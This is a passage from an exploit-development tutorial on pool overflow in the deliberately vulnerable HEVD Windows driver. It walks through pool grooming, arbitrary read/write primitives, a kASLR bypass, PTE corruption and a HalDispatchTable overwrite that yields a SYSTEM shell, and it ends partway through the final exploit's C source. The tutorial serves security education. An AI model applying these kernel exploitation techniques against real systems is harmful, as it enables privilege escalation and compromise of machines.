We then know that another call to ExAllocatePoolWithTag will occur, which will allocate memory for the Name member of ARWHelperObject->Name, where ARWHelperObject is of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX. Let’s set a breakpoint on this memory allocation operation and inspect the contents of the operation.

We can see this chunk is allocated in the same pool and kLFH bucket as the previous ARWHelperObject pointer. The address of this chunk, which is 0xffff838b6e6d73d0, will eventually be set as ARWHelperObject’s Name member, along with ARWHelperObject’s Length member being set to the original user mode input buffer’s Length member, which comes from an ARW_HELPER_OBJECT_IO structure.

From here we can press g in WinDbg to resume execution.

We can clearly see that the kernel-mode address of the ARWHelperObject pointer is bubbled back to user mode via the HelperObjectAddress of the ARW_HELPER_OBJECT_IO object specified in the input and output buffer parameters of the call to DeviceIoControl.

Let’s re-execute everything again and capture the output.

Notice anything? Each time we call CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, based on the analysis above, there is always a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT created. We know there is also an array of these objects created and the created object for each given CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function call is assigned to the array at index FreeIndex. After re-running the updated code, we can see that by calling the function again, and therefore creating another object, the FreeIndex value was increased by one. Re-executing everything again for a second time, we can see this is the case again!

We know that this FreeIndex variable is set via a function call to the GetFreeIndex function, as seen below.

Length = HelperObjectIo->Length;

        DbgPrint("[+] Name Length: 0x%X\n", Length);

        //
        // Get a free index
        //

        FreeIndex = GetFreeIndex();

        if (FreeIndex == STATUS_INVALID_INDEX)
        {
            //
            // Failed to get a free index
            //

            Status = STATUS_INVALID_INDEX;
            DbgPrint("[-] Unable to find FreeIndex: 0x%X\n", Status);

            return Status;
        }

Let’s examine how this function is defined and executed. Taking a look in ArbitraryReadWriteHelperNonPagedPoolNx.c, we can see the function is defined as such.

This function, which returns an integer value, performs a for loop based on MAX_OBJECT_COUNT to determine if the g_ARWHelperObjectNonPagedPoolNx array, which is an array of pointers to ARW_HELPER_OBJECT_NON_PAGED_POOL_NXs, has a value assigned for a given index, which starts at 0. For instance, the for loop first checks if the 0th element in the g_ARWHelperObjectNonPagedPoolNx array is assigned a value. If it is assigned, the index into the array is increased by one. This keeps occurring until the for loop can no longer find a value assigned to a given index. When this is the case, the current value used as the counter is assigned to the value FreeIndex. This value is then passed to the assignment operation used to assign the in-scope ARWHelperObject to the array managing all such objects. This loop occurs MAX_OBJECT_COUNT times, which is defined in ArbitraryReadWriteHelperNonPagedPoolNx.h as #define MAX_OBJECT_COUNT 65535. This is the total amount of objects that can be managed by the g_ARWHelperObjectNonPagedPoolNx array.

The tl;dr of what happens here is in the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function is:

Create a PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT object called ARWHelperObject
Set the Name member of ARWHelperObject to a buffer on the NonPagedPoolNx, which has a value of 0
Set the Length member of ARWHelperObject to the value specified by the user-supplied input buffer via DeviceIoControl
Assign this object to an array which manages all active PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT objects
Return the address of the ARWHelpeObject to user mode via the output buffer of DeviceIoControl

Here is a diagram of this in action.

Let’s take a look at the next IOCTL handler after CreateArbitraryReadWriteHelperObjectNonPagedPoolNx which is SetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler. This IOCTL handler will take the user buffer supplied by DeviceIoControl, which is expected to be of type ARW_HELPER_OBJECT_IO. This structure is then passed to the function SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, which is prototyped as such:

NTSTATUS
SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx(
    _In_ PARW_HELPER_OBJECT_IO HelperObjectIo
)

Let’s take a look at what this function will do with our input buffer. Recall last time we were able to specify the length that was used in the operation on the size of the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object ARWHelperObject. Additionally, we were able to return the address of this pointer to user mode.

This function starts off by defining a few variables:

A pointer named Name
A pointer named HelperObjectAddress
An integer value named Index which is assigned to the status STATUS_INVALID_INDEX
An NTSTATUS code

After these values are declared, This function first checks to make sure the input buffer from user mode, the ARW_HELPER_OBJECT_IO pointer, is in user mode. After confirming this, The Name member, which is a pointer, from this user mode buffer is stored into the pointer Name, previously declared in the listing of declared variables. The HelperObjectAddress member from the user mode buffer - which, after the call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx, contained the kernel mode address of the PARW_HELPER_OBJECT_NON_PAGED_POOL_OBJECT ARWHelperObject, is extracted and stored into the declared HelperObjectAddress at the beginning of the function.

A call to GetIndexFromPointer is made, with the address of the HelperObjectAddress as the argument in this call. If the return value is STATUS_INVALID_INDEX, an NTSTATUS code of STATUS_INVALID_INDEX is returned to the caller. If the function returns anything else, the Index value is printed to the screen.

Where does this value come from? GetIndexFromPointer is defined as such.

This function will accept a value of any pointer, but realistically this is used for a pointer to a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. This function takes the supplied pointer and indexes the array of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers, g_ARWHelperObjectNonPagedPoolNx. If the value hasn’t been assigned to the array (e.g. if CreateArbitraryReadWriteHelperObjectNonPagedPoolNx wasn’t called, as this will assign any created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX to the array or the object was freed), STATUS_INVALID_INDEX is returned. This function basically makes sure the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is managed by the array. If it does exist, this function returns the index of the array the given object resides in.

Let’s take a look at the next snipped of code from the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

After confirming the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX exists, a check is performed to ensure the Name pointer, which was extracted from the user mode buffer of type PARW_HELPER_OBJECT_IO’s Name member, is in user mode. Note that g_ARWHelperObjectNonPagedPoolNx[Index] is being used in this situation as another way to reference the in-scope ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, since all g_ARWHelperObjectNonPagedPoolNx is at the end of the day is an array, of type PARW_HELPER_OBJECT_NON_PAGED_POOL_NX, which manages all active ARW_HELPER_OBJECT_NON_PAGED_POOL_NX pointers.

After confirming the buffer is coming from user mode, this function finishes by copying the value of Name, which is a value supplied by us via DeviceIoControl and the ARW_HELPER_OBJECT_IO object, to the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via CreateArbitraryReadWriteHelperObjectNonPagedPoolNx.

Let’s test this theory in WinDbg. What we should be looking for here is the value specified by the Name member of our user-supplied ARW_HELPER_OBJECT_IO should be written to the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created in the previous call to CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Our updated code looks as follows.

The above code should overwrite the Name member of the previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the function CreateArbitraryReadWriteHelperObjectNonPagedPoolNx. Note that the IOCTL for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x00222067.

We can then set a breakpoint in WinDbg to perform dynamic analysis.

Then we can set a breakpoint on ProbeForRead, which will take the first argument, which is our user-supplied ARW_HELPER_OBJECT_IO, and verify if it is in user mode. We can parse this memory address in WinDbg, which would be in RCX when the function call occurs due to the __fastcall calling convention, and see that this not only is a user-mode buffer, but it is also the object we intended to send from user mode for the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function.

This HelperObjectAddress value is the address of the previously created/associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. We can also verify this in WinDbg.

Recall from earlier that the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object has it’s Length member taken from the Length sent from our user-mode ARW_HELPER_OBJECT_IO structure. The Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is also initialized to zero, per the RtlFillMemory call from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx routine - which initializes the Name buffer to 0 (recall the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX is actually a buffer that was allocated via ExAllocatePoolWithTag by using the specified Length of our ARW_HELPER_OBJECT_IO structure in our DeviceIoControl call).

ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is the member that should be overwritten with the contents of the ARW_HELPER_OBJECT_IO object we sent from user mode, which currently is set to 0x4141414141414141. Knowing this, let’s set a breakpoint on the RtlCopyMemory routine, which will show up as memcpy in HEVD via WinDbg.

This fails. The error code here is actually access denied. Why is this? Recall that there is a one final call to ProbeForRead directly before the memcpy call.

ProbeForRead(
    Name,
    g_ARWHelperObjectNonPagedPoolNx[Index]->Length,
    (ULONG)__alignof(UCHAR)
);

The Name variable here is extracted from the user-mode buffer ARW_HELPER_OBJECT_IO. Since we supplied a value of 0x4141414141414141, this technically isn’t a valid address and the call to ProbeForRead will not be able to locate this address. Instead, let’s create a user-mode pointer and leverage it instead!

After executing the code again and hitting all the breakpoints, we can see that execution now reaches the memcpy routine.

After executing the memcpy routine, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object created from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function now points to the value specified by our user-mode buffer, 0x4141414141414141.

We are starting to get closer to our goal! You can see this is pretty much an uncontrolled arbitrary write primitive in and of itself. The issue here however is that the value we can overwrite, which is ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name is a pointer which is allocated in the kernel via ExAllocatePoolWithTag. Since we cannot directly control the address stored in this member, we are limited to only overwriting what the kernel provides us. The goal for us will be to use the pool overflow vulnerability to overcome this (in the future).

Before getting to the exploitation phase, we need to investigate one more IOCTL handler, plus the IOCTL handler for deleting objects, which should not be time consuming.

The last IOCTL handler to investigate is the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNxIoctlHandler IOCTL handler.

This handler passes the user-supplied buffer, which is of type ARW_HELPER_OBJECT_IO to GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx. This function is identical to the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function, in that it will copy one Name member to another Name member, but in reverse order. As seen below, the Name member used in the destination argument for the call to RtlCopyMemory is from the user-supplied buffer this time.

This means that if we used the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function to overwrite the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object from the CreateArbitraryReadWriteHelperObjectNonPagedPoolNx function then we could use the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx to get the Name member of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object and bubble it up back to user mode. Let’s modify our code to outline this. The IOCTL code to reach the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function is 0x0022206B.

In this case we do not need WinDbg to validate anything. We can simply set the contents of our ARW_HELPER_OBJECT_IO.Name member to junk as a POC that after the IOCL call to reach GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx, this member will be overwritten by the contents of the associated/previously created ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which will be 0x4141414141414141.

Since tempBuffer is assigned to ARW_HELPER_OBJECT_IO.Name, this is technically the value that will inherit the contents of ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name in the memcpy operation from the GetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function. As we can see, we can successfully retrieve the contents of the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name object. Again, however, the issue is that we are not able to choose what ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name points to, as this is determined by the driver. We will use our pool overflow vulnerability soon to overcome this limitation.

The last IOCTL handler is the delete operation, found in DeleteArbitraryReadWriteHelperObjecNonPagedPoolNxIoctlHandler.

This IOCTL handler parses the input buffer from DeviceIoControl as an ARW_HELPER_OBJECT_IO structure. This buffer is then passed to the DeleteArbitraryReadWriteHelperObjecNonPagedPoolNx function.

This function is pretty simplistic - since the HelperObjectAddress is pointing to the associated ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, this member is used in a call to ExAllocateFreePoolWithTag to free the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Additionally, the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member, which also is allocated by ExAllocatePoolWithTag is freed.

Now that we know all of the ins-and-outs of the driver’s functionality, we can continue (please note that we are fortunate to have source code in this case. Leveraging a disassembler make take a bit more time to come to the same conclusions we were able to come to).

Okay, Now Let’s Get Into Exploitation (For Real This Time)

We know that our situation currently allows for an uncontrolled arbitrary read/write primitive. This is because the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.Name member is set currently to the address of a pool allocation via ExAllocatePoolWithTag. With our pool overflow we will try to overwrite this address to a meaningful address. This will allow for us to corrupt a controlled address - thus allowing us to obtain an arbitrary read/write primitive.

Our strategy for grooming the pool, due to all of these objects being the same size and being allocated on the same pool type (NonPagedPoolNx), will be as follows:

“Fill the holes” in the current page servicing allocations of size 0x20
Groom the pool to obtain the following layout: VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | ARW_HELPER_OBJECT_NON_PAGED_POOL_NX
Leverage the read/write primitive to write our shellcode, one QWORD at a time, to KUSER_SHARED_DATA+0x800 and flip the no-eXecute bit to bypass kernel-mode DEP

Recall earlier the sentiment about needing to preserve _POOL_HEADER structures? This is where everything goes full circle for us. Recall from Part 1 that the kLFH still uses the legacy _POOL_HEADER structures to process and store metadata for pool chunks. This means there is no encoding going on, and it is possible to hardcode the header into the exploit so that when the pool overflow occurs we can make sure when the header is overwritten it is overwritten with the same content as before.

Let’s inspect the value of a _POOL_HEADER of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we would be overflowing into.

Since this chunk is 16 bytes and will be part of the kLFH, it is prepended with a standard _POOL_HEADER structure. Since this is the case, and there is no encoding, we can simply hardcode the value of the _POOL_HEADER (recall that the _POOL_HEADER will be 0x10 bytes before the value returned by ExAllocatePoolWithTag). This means we can hardcode the value 0x6b63614802020000 into our exploit so that at the time of the overflow into the next chunk, which should be into one of these ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects we have previously sprayed, the first 0x10 bytes that are overflown of this chunk, which will be the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX’s _POOL_HEADER, will be preserved and kept as valid, bypassing the earlier issue shown when an invalid header occurs.

Knowing this, and knowing we have a bit of work to do, let’s rearrange our current exploit to make it more logical. We will create three functions for grooming:

fillHoles()
groomPool()
pokeHoles()

These functions can be seen below.

fillHoles()

groomPool()

pokeHoles()

Please refer to Part 1 to understand what this is doing, but essentially this technique will fill any fragments in the corresponding kLFH bucket in the NonPagedPoolNx and force the memory manager to (theoretically) give us a new page to work with. We then fill this new page with objects we control, e.g. the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects

Since we have a controlled pool-based overflow, the goal will be to overwrite any of the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structures with the “vulnerable chunk” that copies memory into the allocation, without any bounds checking. Since the vulnerable chunk and the ARW_HELPER_OBJECT_NON_PAGED_POOL_NX chunks are of the same size, they will both wind up being adjacent to each other theoretically, since they will land in the same kLFH bucket.

The last function, called readwritePrimitive() contains most of the exploit code.

The first bit of this function creates a “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX via an ARW_HELPER_OBJECT_IO object, and performs the filling of the pool chunks, fills the new page with objects we control, and then frees every other one of these objects.

After freeing every other object, we then replace these freed slots with our vulnerable buffers. We also create a “standalone/main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. Also note that the pool header is 16 bytes in size, meaning it is 2 QWORDS, hence “Padding”.

What we actually hope to do here, is the following.

We want to use a controlled write to only overwrite the first member of this adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, Name. This is because we have additional primitives to control and return these values of the Name member as shown in this blog post. The issue we have had so far, however, is the address of the Name member of a ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object is completely controlled by the driver and cannot be influenced by us, unless we leverage a vulnerability (a la pool overflow).

As shown in the readwritePrimitive() function, the goal here will be to actually corrupt the adjacent chunk(s) with the address of the “main” ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object, which we will manage via ARW_HELPER_OBJECT_IO.HelperObjectAddress. We would like to corrupt the adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object with a precise overflow to corrupt the Name value with the address of our “main” object. Currently this value is set to 0x9090909090909090. Once we prove this is possible, we can then take this further to obtain the eventual read/write primitive.

Setting a breakpoint on the TriggerBufferOverflowNonPagedPoolNx routine in HEVD.sys, and setting an additional breakpoint on the memcpy routine, which performs the pool overflow, we can investigate the contents of the pool.

As seen in the above image, we can clearly see we have flooded the pool with controlled ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects, as well as the “current” chunk - which refers to the vulnerable chunk used in the pool overflow. All of these chunks are prefaced with the Hack tag.

Then, after stepping through execution until the mempcy routine, we can inspect the contents of the next chunk, which is 0x10 bytes after the value in RCX, which is used in the destination for the memory copy operation. Remember - our goal is to overwrite the adjacent pool chunks. Stepping through the operation to clearly see that we have corrupted the next pool chunk, which is of type ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

We can validate that the address which was written out-of-bounds is actually the address of the “main”, standalone ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object we created.

Remember - a _POOL_HEADER structure is 0x10 bytes in length. This makes every pool chunk within this kLFH bucket 0x20 bytes in total size. Since we want to overflow adjacent chunks, we need to preserve the pool header. Since we are in the kLFH, we can just hardcode the pool header, as we have proven, to satisfy the pool and to avoid any crashes which may arise as a result of an invalid pool chunk. Additionally, we can corrupt the first 0x10 bytes of the value in RCX, which is the destination address in the memory copy operation, because there are 0x20 bytes in the “vulnerable” pool chunk (which is used in the copy operation). The first 0x10 bytes are the header and the second half we actually don’t care about, as we are worried about corrupting an adjacent chunk. Because of this, we can set the first 0x10 bytes of our copy, which writes out of bounds, to 0x10 to ensure that the bytes which are copied out of bounds are the bytes that comprise the pool header of the next chunk.

We have now successfully performed out out-of-bounds write via a pool overflow, and have corrupted an adjacent ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object’s Name member, which is dynamically allocated on the pool before had and has an address we do not control, unless we use a vulnerability such as an out-of-bounds write, with an address we do control, which is the address of the object created previously.

Arbitrary Read Primitive

Although it may not be totally apparent currently, our exploit strategy revolves around our ability to use our pool overflow to write out-of-bounds. Recall that the “Set” and “Get” capabilities in the driver allow us to read and write memory, but not at controlled locations. The location is controlled by the pool chunk allocated for the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX.

Let’s take a look at the corrupted ARW_HELPER_OBJECT_NON_PAGED_POOL_NX object. The corrupted object is one of the many sprayed objects. We successfully overwrote the Name member of this object with the address of the “main”, or standalone ARE_HELPER_OBJECT_NON_PAGED_POOL_NX object.

We know that it is possible to set the Name member of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX structure via the SetArbitraryReadWriteHelperObjecNameNonPagedPoolNx function through an IOCTL invocation. Since we are now able to control the value of Name in the corrupted object, let’s see if we can’t abuse this through an arbitrary read primitive.

Let’s break this down. We know that we currently have a corrupted object with a Name member that is set to the value of another object. For brevity, we can recall this from the previous image.

If we do a “Set” operation currently on the corrupted object, shown in the dt command and currently has its Name member set to 0xffffa00ca378c210, it will perform this operation on the Name member. However, we know that the Name member is actually currently set to the value of the “main” object via the out-of-bounds write! This means that performing a “Set” operation on the corrupted object will actually take the address of the main object, since it is set in the Name member, dereference it, and write the contents specified by us. This will cause our main object to then point to whatever we specify, instead of the value of ffffa00ca378c3b0 currently outlined in the memory contents shown by dq in WinDbg. How does this turn into an arbitrary read primitive? Since our “main” object will point to whatever address we specify, the “Get” operation, if performed on the “main” object, will then dereference this address specified by us and return the value!

In WinDbg, we can “mimic” the “Set” operation as shown.

Performing the “Set” operation on the corrupted object will actually set the value of our main object to whatever is specified to the user, due to us corrupting the previous random address with the pool overflow vulnerability. At this point, performing the “Get” operation on our main object, since it was set to the value specified by the user, would dereference the value and return it to us!

At this point we need to identify what out goal is. To comprehensively bypass kASLR, our goal is as follows:

Use the base address of HEVD.sys from the original exploit in part one to provide the offset to the Import Address Table
Supply an IAT entry that points to ntoskrnl.exe to the exploit to be arbitrarily read from (thus obtaining a pointer to ntoskrnl.exe)
Calculate the distance from the pointer to the kernel to obtain the base

We can update our code to outline this. As you may recall, we have groomed the pool with 5000 ARW_HELPER_OBJECT_NON_PAGED_POOL_NX objects. However, we did not spray the pool with 5000 “vulnerable” objects. Since we have groomed the pool, we know that our vulnerable object we can arbitrarily write past will end up adjacent to one of the objects used for grooming. Since we only trigger the overflow once, and since we have already set Name values on all of the objects used for grooming, a value of 0x9090909090909090, we can simply use the “Get” operation in order to view each Name member of the objects used for grooming. If one of the objects does not contain NOPs, this is indicative that the pool overflow outlined previously to corrupt the Name value of an ARW_HELPER_OBJECT_NON_PAGED_POOL_NX has succeeded.

After this, we can then use the same primitive previously mentioned about now using the “Set” functionality in HEVD to set the Name member of the targeted corrupted object, which would actually “trick” the program to overwrite the Name member of the corrupted object, which is actually the address of the “standalone”/main ARW_HELPER_OBJECT_NON_PAGED_POOL_NX. The overwrite will dereference the standalone object, thus allowing for an arbitrary read primitive since we have the ability to then later use the “Get” functionality on the main object later.

We then can add a “press enter to continue” function to our exploit to pause execution after the main object is printed to the screen, as well as the corrupted object used for grooming that resides within the 5000 objects used for grooming.

We then can take the address 0xffff8e03c8d5c2b0, which is the corrupted object, and inspect it in WinDbg. If all goes well, this address should contain the address of the “main” object.

Comparing the Name member to the previous screenshot in which the exploit with the “press enter to continue” statement is in, we can see that the pool corruption was successful and that the Name member of one of the 5000 objects used for grooming was overwritten!

Now, if we were to use the “Set” functionality of HEVD and supply the ARW_HELPER_OBJECT_NON_PAGED_POOL object that was corrupted and also used for grooming, at address 0xffff8e03c8d5c2b0, HEVD would use the value stored in Name, dereference it, and overwrite it. This is because HEVD is expecting one of the pool allocations previously showcased for Name pointers, which we do not control. Since we have supplied another address, what HEVD will actually do is perform the overwite, but this time it will overwrite the pointer we supplied, which is another ARW_HELPER_OBJECT_NON_PAGED_POOL. Since the first member of one of these objects has a member Name, what will happen is that HEVD will actually write whatever we supply to the Name member of our main object! Let’s view this in WinDbg.

As our exploit showcased, we are using HEVD+0x2038 in this case. This value should be written to our main object.

As you can see, our main object now has its Name member pointing to HEVD+0x2038, which is a pointer to the kernel! After running the full exploit, we have now obtained the base address of HEVD from the previous exploit, and now the base of the kernel via an arbitrary read by way of pool overflow - all from low integrity!

The beauty of this technique of leveraging two objects should be clear now - we do not have to constantly perform overflows of objects in order to perform exploitation. We can now just simply use the main object to read!

Our exploitation technique will be to corrupt the page table entries of our eventual memory page our shellcode resides in. If you are not familiar with this technique, I have two blogs written on the subject, plus one about memory paging. You can find them here: one, two, and three.

For our purposes, we will need to following items arbitrarily read:

nt!MiGetPteAddress+0x13 - this contains the base of the PTEs needed for calculations
PTE bits that make up the shellcode page
[nt!HalDispatchTable+0x8] - used to execute our shellcode. We first need to preserve this address by reading it to ensure exploit stability

Let’s add a routine to address the first issue, reading the base of the page table entries. We can calculate the offset to the function MiGetPteAddress+0x13 and then use our arbitrary read primitive.

Leveraging the exact same method as before, we can see we have defeated page table randomization and have the base of the page table entries in hand!

The next step is to obtain the PTE bits that make up the shellcode page. We will eventually write our shellcode to KUSER_SHARED_DATA+0x800 in kernel mode, which is at a static address of 0xfffff87000000800. We can instrument the routine to obtain this information in C.

After running the updated exploit, we can see that we are able to leak the PTE bits for KUSER_SHARED_DATA+0x800, where our shellcode will eventually reside.

Note that the !pte extension in WinDbg was giving myself trouble. So, from the debuggee machine, I ran WinDbg “classic” with local kernel debugging (lkd) to show the contents of !pte. Notice the actual virtual address for the PTE has changed, but the contents of the PTE bits are the same. This is due to myself rebooting the machine and kASLR kicking in. The WinDbg “classic” screenshot is meant to just outline the PTE contents.

You can view this previous blog) from myself to understand the permissions KUSER_SHARED_DATA has, which is write but no execute. The last item we need is the contents of [nt!HalDispatchTable].

After executing the updated code, we can see we have preserved the value [nt!HalDispatchTable+0x8].

The last item on the agenda is the write primitive, which is 99 percent identical to the read primitive. After writing our shellcode to kernel mode and then corrupting the PTE of the shellcode page, we will be able to successfully escalate our privileges.

Arbitrary Write Primitive

Leveraging the same concepts from the arbitrary read primitive, we can also arbitrarily overwrite 64-bit pointers! Instead of using the “Get” operation in order to fetch the dereferenced contents of the Name value specified by the “corrupted” ARW_HELPER_NON_PAGED_POOL_NX object, and then returning this value to the Name value specified by the “main” object, this time we will set the Name value of the “main” object not to a pointer that receives the contents, but to the value of what we would like to overwrite memory with. In this case, we want to set this value to the value of shellcode, and then set the Name value of the “corrupted” object to KUSER_SHARED_DATA+0x800 incrementally.

From here we can run our updated exploit. Since we have created a loop to automate the writing process, we can see we are able to arbitrarily write the contents of the 9 QWORDS which make up our shellcode to KUSER_SHARED_DATA+0x800!

Awesome! We have now successfully performed the arbitrary write primitive! The next goal is to corrupt the contents of the PTE for the KUSER_SHARED_DATA+0x800 page.

From here we can use WinDbg classic to inspect the PTE before and after the write operation.

Awesome! Our exploit now just needs three more things:

Corrupt [nt!HalDispatchTable+0x8] to point to KUSER_SHARED_DATA+0x800
Invoke ntdll!NtQueryIntervalPRofile, which will perform the transition to kernel mode to invoke [nt!HalDispatchTable+0x8], thus executing our shellcode
Restore [nt!HalDispatchTable+0x8] with the arbitrary write primitive

Let’s update our exploit code to perform step one.

After executing the updated code, we can see that we have successfully overwritten nt!HalDispatchTable+0x8 with the address of KUSER_SHARED_DATA+0x800 - which contains our shellcode!

Next, we can add the routing to dynamically resolve ntdll!NtQueryIntervalProfile, invoke it, and then restore [nt!HalDispatchTable+0x8]

The final result is a SYSTEM shell from low integrity!

“…Unless We Conquer, As Conquer We Must, As Conquer We Shall.”

Hopefully you, as the reader, found this two-part series on pool corruption useful! As aforementioned in the beginning of this post, we must expect mitigations such as VBS and HVCI to be enabled in the future. ROP is still a viable alternative in the kernel due to the lack of kernel CET (kCET) at the moment (although I am sure this is subject to change). As such, techniques such as the one outlined in this blog post will soon be deprecated, leaving us with fewer options for exploitation than which we started. Data-only attacks are always viable, and there have been more novel techniques mentioned, such as this tweet sent to myself by Dmytro, which talks about leveraging ROP to forge kernel function calls even with VBS/HVCI enabled. As the title of this last section of the blog articulates, where there is a will there is a way - and although the bar will be raised, this is only par for the course with exploit development over the past few years. KPP + VBS + HVCI + kCFG/kXFG + SMEP + DEP + kASLR + kCET and many other mitigations will prove very useful for blocking most exploits. I hope that researchers stay hungry and continue to push the limits with this mitigations to find more novel ways to keep exploit development alive!

Peace, love, and positivity :-).

Here is the final exploit code, which is also available on my GitHub:

// HackSysExtreme Vulnerable Driver: Pool Overflow + Memory Disclosure
// Author: Connor McGarr (@33y0re)

#include <windows.h>
#include <stdio.h>

// typdef an ARW_HELPER_OBJECT_IO struct
typedef struct _ARW_HELPER_OBJECT_IO
{
    PVOID HelperObjectAddress;
    PVOID Name;
    SIZE_T Length;
} ARW_HELPER_OBJECT_IO, * PARW_HELPER_OBJECT_IO;

// Create a global array of ARW_HELPER_OBJECT_IO objects to manage the groomed pool allocations
ARW_HELPER_OBJECT_IO helperobjectArray[5000] = { 0 };

// Prepping call to nt!NtQueryIntervalProfile
typedef NTSTATUS(WINAPI* NtQueryIntervalProfile_t)(IN ULONG ProfileSource, OUT PULONG Interval);

// Leak the base of HEVD.sys
unsigned long long memLeak(HANDLE driverHandle)
{
    // Array to manage handles opened by CreateEventA
    HANDLE eventObjects[5000];

    // Spray 5000 objects to fill the new page
    for (int i = 0; i <= 5000; i++)
    {
        // Create the objects
        HANDLE tempHandle = CreateEventA(
            NULL,
            FALSE,
            FALSE,
            NULL
        );

        // Assign the handles to the array
        eventObjects[i] = tempHandle;
    }

    // Check to see if the first handle is a valid handle
    if (eventObjects[0] == NULL)
    {
        printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());

        return 0x1;
        exit(-1);
    }
    else
    {
        printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

        // Close half of the handles
        for (int i = 0; i <= 5000; i += 2)
        {
            BOOL tempHandle1 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle1)
            {
                printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        printf("[+] Poked holes in the new pool page!\n");

        // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
        // kLFH should automatically fill the freed holes with the UAF objects
        DWORD bytesReturned;

        for (int i = 0; i < 2500; i++)
        {
            DeviceIoControl(
                driverHandle,
                0x00222053,
                NULL,
                0,
                NULL,
                0,
                &bytesReturned,
                NULL
            );
        }

        printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

        // Close the rest of the event objects
        for (int i = 1; i <= 5000; i += 2)
        {
            BOOL tempHandle2 = CloseHandle(
                eventObjects[i]
            );

            eventObjects[i] = NULL;

            // Error handling
            if (!tempHandle2)
            {
                printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());

                return 0x1;
                exit(-1);
            }
        }

        // Array to store the buffer (output buffer for DeviceIoControl) and the base address
        unsigned long long outputBuffer[100];
        unsigned long long hevdBase = 0;

        // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
        // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

        for (int i = 0; i <= 100; i++)
        {
            // Return buffer
            DWORD bytesReturned1;

            DeviceIoControl(
                driverHandle,
                0x0022204f,
                NULL,
                0,
                &outputBuffer,
                sizeof(outputBuffer),
                &bytesReturned1,
                NULL
            );

        }

